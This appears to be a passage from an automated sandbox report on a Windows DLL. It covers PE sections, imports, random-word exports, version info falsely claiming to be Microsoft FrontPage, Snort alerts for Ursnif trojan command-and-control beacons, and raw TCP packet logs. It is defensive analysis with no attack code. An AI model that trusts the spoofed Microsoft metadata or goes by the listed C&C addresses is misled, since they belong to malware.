(nameless) | 0x14000 | 0xaa89 | 0x200 | False | 0.400390625 | data | 2.8122785819 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
(nameless) | 0x1f000 | 0xed | 0x200 | False | 0.427734375 | data | 2.99218036913 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
(nameless) | 0x20000 | 0xaa6c | 0x200 | False | 0.357421875 | data | 2.55234629154 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
(nameless) | 0x2b000 | 0xaaa8 | 0x200 | False | 0.423828125 | data | 2.88109872148 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rdata | 0x36000 | 0xf4 | 0x200 | False | 0.28515625 | data | 2.29418780158 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x37000 | 0x279ba | 0x1d000 | False | 0.527899380388 | data | 5.29515323456 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0x5f000 | 0xa9b4 | 0xaa00 | False | 0.405078125 | data | 5.36948542132 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x6a000 | 0x2198 | 0x2200 | False | 0.801470588235 | data | 6.81021842164 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                  Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x5f388 | 0x2e8 | data | English | United States
RT_ICON | 0x5f670 | 0x128 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0x5f798 | 0x1628 | dBase IV DBT of \200.DBF, blocks size 0, block length 4608, next free block index 40, next free block 791621542, next used block 2795544736 | English | United States
RT_ICON | 0x60dc0 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0x61228 | 0x988 | data | English | United States
RT_ICON | 0x61bb0 | 0x10a8 | dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0 | English | United States
RT_ICON | 0x62c58 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0 | English | United States
RT_ICON | 0x65200 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0 | English | United States
RT_GROUP_ICON | 0x69428 | 0x14 | data | English | United States
RT_GROUP_ICON | 0x6943c | 0x14 | data | English | United States
RT_GROUP_ICON | 0x69450 | 0x14 | data | English | United States
RT_GROUP_ICON | 0x69464 | 0x14 | data | English | United States
RT_GROUP_ICON | 0x69478 | 0x14 | data | English | United States
RT_GROUP_ICON | 0x6948c | 0x14 | data | English | United States
RT_GROUP_ICON | 0x694a0 | 0x14 | data | English | United States
RT_GROUP_ICON | 0x694b4 | 0x14 | data | English | United States
RT_VERSION | 0x694c8 | 0x4ec | data | English | United States

                                                                                                                                                                                                                                  Imports

DLL | Import
advapi32.dll | DeregisterEventSource, ReportEventW, RegCloseKey, RegisterEventSourceW, RegOpenKeyExW
dssenh.dll | CPVerifySignature
kernel32.dll | VirtualProtectEx, FindFirstFileExW, EnterCriticalSection, TlsAlloc, LCMapStringW, GetTempPathW, GetFullPathNameW, QueryPerformanceCounter, TlsSetValue, MultiByteToWideChar, SetLastError, IsProcessorFeaturePresent, GetFileAttributesExW, WideCharToMultiByte, LeaveCriticalSection, OutputDebugStringW, GetModuleHandleExW, RaiseException, GetStringTypeW, LoadLibraryExW, RemoveDirectoryW, IsWow64Process, DeleteCriticalSection, GetProcAddress, InitializeCriticalSection, SetUnhandledExceptionFilter, TlsFree, Sleep, GetModuleFileNameW, IsDebuggerPresent, LoadLibraryA, GetCurrentProcess, GetLastError, GetCurrentThreadId, InitializeCriticalSectionAndSpinCount, TerminateProcess, TlsGetValue, UnhandledExceptionFilter, GetModuleHandleW, RtlUnwind, InitializeSListHead, FindNextFileW, GetEnvironmentVariableW, SwitchToThread, CreateDirectoryW, FreeLibrary, FindClose, GetCurrentProcessId
shell32.dll | ShellExecuteW
user32.dll | MessageBoxW

                                                                                                                                                                                                                                  Exports

Name | Ordinal | Address
Aquatically | 1 | 0x401d64
Episodically | 2 | 0x401f9b
Kakapo | 3 | 0x402686
Overdistantness | 4 | 0x4026c9
Pseudopodal | 5 | 0x4027af
Microphage | 6 | 0x4029d4
Cytost | 7 | 0x402dd1
Reattach | 8 | 0x402f9a
Vigia | 9 | 0x4037fe
Preallable | 10 | 0x403ac1
Amphistomous | 11 | 0x403d01
DllRegisterServer | 12 | 0x403f1f
Americanistic | 13 | 0x404150
Suprahumanity | 14 | 0x40454c
Eupyrchroite | 15 | 0x404698
Splitbeak | 16 | 0x404e58
Andirin | 17 | 0x405002
                                                                                                                                                                                                                                  Drail180x4050c1
                                                                                                                                                                                                                                  Exequatur190x405267
                                                                                                                                                                                                                                  Meith200x405a59
                                                                                                                                                                                                                                  Undergrow210x4063bb
                                                                                                                                                                                                                                  Teaseableness220x4064de
                                                                                                                                                                                                                                  Joggler230x406589
                                                                                                                                                                                                                                  Swahilese240x4066c8
                                                                                                                                                                                                                                  Myelinated250x40676a
                                                                                                                                                                                                                                  Pyroxenic260x406af1
                                                                                                                                                                                                                                  Godspeed270x40710b
                                                                                                                                                                                                                                  Vigor280x407189
                                                                                                                                                                                                                                  Premedieval290x4078e3
                                                                                                                                                                                                                                  Papalizer300x40797c
                                                                                                                                                                                                                                  Coiled310x407a15
                                                                                                                                                                                                                                  Tarentala320x408120
                                                                                                                                                                                                                                  Hopbush330x40887a
                                                                                                                                                                                                                                  Bischofite340x40894f
                                                                                                                                                                                                                                  Everliving350x408ab4
                                                                                                                                                                                                                                  Mucigen360x408dc6
                                                                                                                                                                                                                                  Cigarito370x4090a9
                                                                                                                                                                                                                                  Cabree380x4091df
                                                                                                                                                                                                                                  DllUnregisterServer390x409499
                                                                                                                                                                                                                                  Unprovidenced400x4097e9
                                                                                                                                                                                                                                  Arosaguntacook410x409880
                                                                                                                                                                                                                                  Lysimeter420x40a518
                                                                                                                                                                                                                                  Nonchokebore430x40aca7
                                                                                                                                                                                                                                  Eccaleobion440x40af98
                                                                                                                                                                                                                                  Gelatinously450x40b1ad
                                                                                                                                                                                                                                  Tlapallan460x40b3aa
                                                                                                                                                                                                                                  Amphicyrtic470x40b770
                                                                                                                                                                                                                                  Alpinesque480x40b825
                                                                                                                                                                                                                                  Spermatocyst490x40b8d4
                                                                                                                                                                                                                                  Pseudostomous500x40b979
                                                                                                                                                                                                                                  Misogynism510x40bb62
                                                                                                                                                                                                                                  Delsarte520x40bca3
                                                                                                                                                                                                                                  Kobird530x40c0f8
                                                                                                                                                                                                                                  Dracocephalum540x40c4c7
                                                                                                                                                                                                                                  Goanese550x40c667
                                                                                                                                                                                                                                  Peltate560x40c9b9
                                                                                                                                                                                                                                  Sturiones570x40cb2d
                                                                                                                                                                                                                                  Meebos580x40cf4a
                                                                                                                                                                                                                                  Cardiameter590x40d35c
                                                                                                                                                                                                                                  Disguster600x40d620
                                                                                                                                                                                                                                  Monobromoacetone610x40d6cf
                                                                                                                                                                                                                                  Bacchanalize620x40d803
                                                                                                                                                                                                                                  Azeotropism630x40dbf1
                                                                                                                                                                                                                                  Holconoti640x40dc9d
                                                                                                                                                                                                                                  Microgametophyte650x40dfaf
                                                                                                                                                                                                                                  Crenated660x40e3e1
                                                                                                                                                                                                                                  Overgratefully670x40e482
                                                                                                                                                                                                                                  Prodramatic680x40e7ce
                                                                                                                                                                                                                                  Uncondensableness690x40ea33
                                                                                                                                                                                                                                  Disporous700x40eae2
                                                                                                                                                                                                                                  Trichophore710x40f00e
                                                                                                                                                                                                                                  Profluvium720x40f444
                                                                                                                                                                                                                                  Unreduceable730x40f4f2

                                                                                                                                                                                                                                  Version Infos

Description       Data
LegalCopyright    Copyright 1995-1999 Microsoft Corporation, All rights reserved.
FileVersion       4.0.2.7523
CompanyName       Microsoft Corporation
LegalTrademark1   Microsoft, Windows, and FrontPage are registered trademarks of Microsoft Corporation, and WebBot is a trademark of Microsoft Corporation, in the United States and/or other countries.
ProductName       Microsoft FrontPage 2000
ProductVersion    4.0.2.7523
FileDescription   Microsoft FrontPage Server Extensions
OriginalFilename  RPCTEST.DLL
Translation       0x0409 0x04b0

                                                                                                                                                                                                                                  Possible Origin

Language of compilation system  Country where language is spoken
English                         United States

                                                                                                                                                                                                                                  Network Behavior

                                                                                                                                                                                                                                  Snort IDS Alerts

Timestamp                 Protocol  SID      Message                                                    Source Port  Dest Port  Source IP    Dest IP
09/10/21-11:12:31.213751  TCP       2033203  ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)  49824        80         192.168.2.7  13.225.29.191
09/10/21-11:13:13.069914  TCP       2033204  ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)  49887        80         192.168.2.7  13.225.29.191
09/10/21-11:13:13.069914  TCP       2033203  ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)  49887        80         192.168.2.7  13.225.29.191
09/10/21-11:13:28.241213  TCP       2033203  ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)  49824        80         192.168.2.7  13.225.29.191
09/10/21-11:13:39.121591  TCP       2033204  ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)  49935        80         192.168.2.7  13.225.29.204
09/10/21-11:13:39.121591  TCP       2033203  ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)  49935        80         192.168.2.7  13.225.29.204
09/10/21-11:13:53.557957  TCP       2033203  ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)  49938        80         192.168.2.7  13.225.29.191

                                                                                                                                                                                                                                  Network Port Distribution

                                                                                                                                                                                                                                  TCP Packets

                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.032222033 CEST44349742172.67.70.134192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.032289028 CEST49742443192.168.2.7172.67.70.134
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.034219027 CEST49741443192.168.2.7172.67.70.134
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.034238100 CEST44349741172.67.70.134192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.045172930 CEST49742443192.168.2.7172.67.70.134
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.045206070 CEST44349742172.67.70.134192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.082495928 CEST44349741172.67.70.134192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.083105087 CEST49741443192.168.2.7172.67.70.134
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.083287001 CEST44349742172.67.70.134192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.083370924 CEST49742443192.168.2.7172.67.70.134
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.137413025 CEST49741443192.168.2.7172.67.70.134
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.137429953 CEST44349741172.67.70.134192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.137868881 CEST44349741172.67.70.134192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.137954950 CEST49741443192.168.2.7172.67.70.134
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.138336897 CEST49741443192.168.2.7172.67.70.134
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.163327932 CEST44349741172.67.70.134192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.163376093 CEST44349741172.67.70.134192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.163408041 CEST44349741172.67.70.134192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.163439989 CEST44349741172.67.70.134192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.163466930 CEST49741443192.168.2.7172.67.70.134
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.163474083 CEST44349741172.67.70.134192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.163486958 CEST44349741172.67.70.134192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.163505077 CEST49741443192.168.2.7172.67.70.134
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.163541079 CEST44349741172.67.70.134192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.163557053 CEST49741443192.168.2.7172.67.70.134
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.163568974 CEST44349741172.67.70.134192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.163590908 CEST49741443192.168.2.7172.67.70.134
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.163619995 CEST49741443192.168.2.7172.67.70.134
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.163748026 CEST44349741172.67.70.134192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.163844109 CEST49741443192.168.2.7172.67.70.134
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.163852930 CEST44349741172.67.70.134192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.163928032 CEST49741443192.168.2.7172.67.70.134
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.172432899 CEST49741443192.168.2.7172.67.70.134
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.172579050 CEST44349741172.67.70.134192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.172713995 CEST49741443192.168.2.7172.67.70.134
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.184880972 CEST49742443192.168.2.7172.67.70.134
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.184906960 CEST44349742172.67.70.134192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.185267925 CEST44349742172.67.70.134192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.186017990 CEST49742443192.168.2.7172.67.70.134
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.471839905 CEST49745443192.168.2.7172.217.19.102
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.471894026 CEST44349745172.217.19.102192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.471982956 CEST49745443192.168.2.7172.217.19.102
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.478007078 CEST49746443192.168.2.7172.217.19.102
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.478059053 CEST44349746172.217.19.102192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.478183031 CEST49746443192.168.2.7172.217.19.102
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.479474068 CEST49745443192.168.2.7172.217.19.102
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.479499102 CEST44349745172.217.19.102192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.493963003 CEST49746443192.168.2.7172.217.19.102
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.493985891 CEST44349746172.217.19.102192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.494864941 CEST49747443192.168.2.7104.26.2.70
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.494905949 CEST44349747104.26.2.70192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.495002985 CEST49748443192.168.2.7104.26.2.70
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.495023966 CEST49747443192.168.2.7104.26.2.70
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.495038033 CEST44349748104.26.2.70192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.495146036 CEST49748443192.168.2.7104.26.2.70
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.496280909 CEST49748443192.168.2.7104.26.2.70
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.496294022 CEST49747443192.168.2.7104.26.2.70
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.496303082 CEST44349748104.26.2.70192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.496313095 CEST44349747104.26.2.70192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.546410084 CEST44349748104.26.2.70192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.546515942 CEST49748443192.168.2.7104.26.2.70
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.553174019 CEST44349747104.26.2.70192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.553323984 CEST49747443192.168.2.7104.26.2.70
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.556145906 CEST49748443192.168.2.7104.26.2.70
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.556173086 CEST44349748104.26.2.70192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.556494951 CEST49748443192.168.2.7104.26.2.70
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.556508064 CEST44349748104.26.2.70192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.556629896 CEST44349748104.26.2.70192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.556718111 CEST49748443192.168.2.7104.26.2.70
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.559001923 CEST49747443192.168.2.7104.26.2.70
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.559040070 CEST44349747104.26.2.70192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.559701920 CEST44349747104.26.2.70192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.559807062 CEST49747443192.168.2.7104.26.2.70
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.593039989 CEST44349748104.26.2.70192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.593189955 CEST49748443192.168.2.7104.26.2.70
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.593214035 CEST44349748104.26.2.70192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.593276978 CEST49748443192.168.2.7104.26.2.70
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.594934940 CEST49748443192.168.2.7104.26.2.70
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.598160982 CEST44349748104.26.2.70192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.598294020 CEST49748443192.168.2.7104.26.2.70
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.622270107 CEST44349745172.217.19.102192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.624134064 CEST49745443192.168.2.7172.217.19.102
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.629158974 CEST44349746172.217.19.102192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.629292011 CEST49746443192.168.2.7172.217.19.102
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.664627075 CEST49745443192.168.2.7172.217.19.102
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.664649010 CEST44349745172.217.19.102192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.664691925 CEST49745443192.168.2.7172.217.19.102
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.664710999 CEST44349745172.217.19.102192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.666762114 CEST44349745172.217.19.102192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.666897058 CEST49745443192.168.2.7172.217.19.102
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.679388046 CEST49746443192.168.2.7172.217.19.102
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.679435968 CEST44349746172.217.19.102192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.679876089 CEST44349746172.217.19.102192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.679948092 CEST49746443192.168.2.7172.217.19.102
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.700870037 CEST44349745172.217.19.102192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.374238014 CEST44349777151.101.1.44192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.374264956 CEST49777443192.168.2.7151.101.1.44
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.374290943 CEST44349777151.101.1.44192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.374294043 CEST49777443192.168.2.7151.101.1.44
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.374304056 CEST44349777151.101.1.44192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.374346018 CEST49777443192.168.2.7151.101.1.44
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.374479055 CEST49777443192.168.2.7151.101.1.44
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.374485970 CEST44349777151.101.1.44192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.374530077 CEST49777443192.168.2.7151.101.1.44
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.375319004 CEST44349777151.101.1.44192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.375381947 CEST49777443192.168.2.7151.101.1.44
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.375395060 CEST44349777151.101.1.44192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.375433922 CEST49777443192.168.2.7151.101.1.44
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.376120090 CEST44349776151.101.1.44192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.376194000 CEST49776443192.168.2.7151.101.1.44
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.385014057 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.385097980 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.385191917 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.385237932 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.385251999 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.385297060 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.385325909 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.385377884 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.385402918 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.385447979 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.385468006 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.385509968 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.385523081 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.385564089 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.385572910 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.385615110 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.385641098 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.385684967 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.385694027 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.385736942 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.390500069 CEST49777443192.168.2.7151.101.1.44
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.390691042 CEST44349777151.101.1.44192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.390767097 CEST49777443192.168.2.7151.101.1.44
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.392287016 CEST44349778151.101.1.44192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.392461061 CEST49778443192.168.2.7151.101.1.44
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.392473936 CEST44349778151.101.1.44192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.392540932 CEST44349778151.101.1.44192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.392580986 CEST49778443192.168.2.7151.101.1.44
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.392591000 CEST44349778151.101.1.44192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.392600060 CEST49778443192.168.2.7151.101.1.44
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.392632008 CEST44349778151.101.1.44192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.392668009 CEST49778443192.168.2.7151.101.1.44
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.392673969 CEST49778443192.168.2.7151.101.1.44
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.392678022 CEST44349778151.101.1.44192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.392694950 CEST44349778151.101.1.44192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.392733097 CEST49778443192.168.2.7151.101.1.44
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.392772913 CEST44349778151.101.1.44192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.392781973 CEST49778443192.168.2.7151.101.1.44
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.392803907 CEST44349778151.101.1.44192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.392832994 CEST49778443192.168.2.7151.101.1.44
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.392843962 CEST44349778151.101.1.44192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.392879963 CEST49778443192.168.2.7151.101.1.44
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.392884016 CEST49778443192.168.2.7151.101.1.44
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.392884970 CEST44349778151.101.1.44192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.392899990 CEST44349778151.101.1.44192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.392945051 CEST49778443192.168.2.7151.101.1.44
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.393678904 CEST49778443192.168.2.7151.101.1.44
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.393822908 CEST44349778151.101.1.44192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.393882036 CEST49778443192.168.2.7151.101.1.44
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.393950939 CEST44349778151.101.1.44192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.394238949 CEST49778443192.168.2.7151.101.1.44
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.394248009 CEST44349778151.101.1.44192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.395153999 CEST49778443192.168.2.7151.101.1.44
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.395175934 CEST49778443192.168.2.7151.101.1.44
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.395625114 CEST44349778151.101.1.44192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.395782948 CEST49778443192.168.2.7151.101.1.44
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.401945114 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.402034044 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.402118921 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.402178049 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.402190924 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.402249098 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.402256966 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.402367115 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.402419090 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.402472973 CEST4434977987.248.118.23192.168.2.7
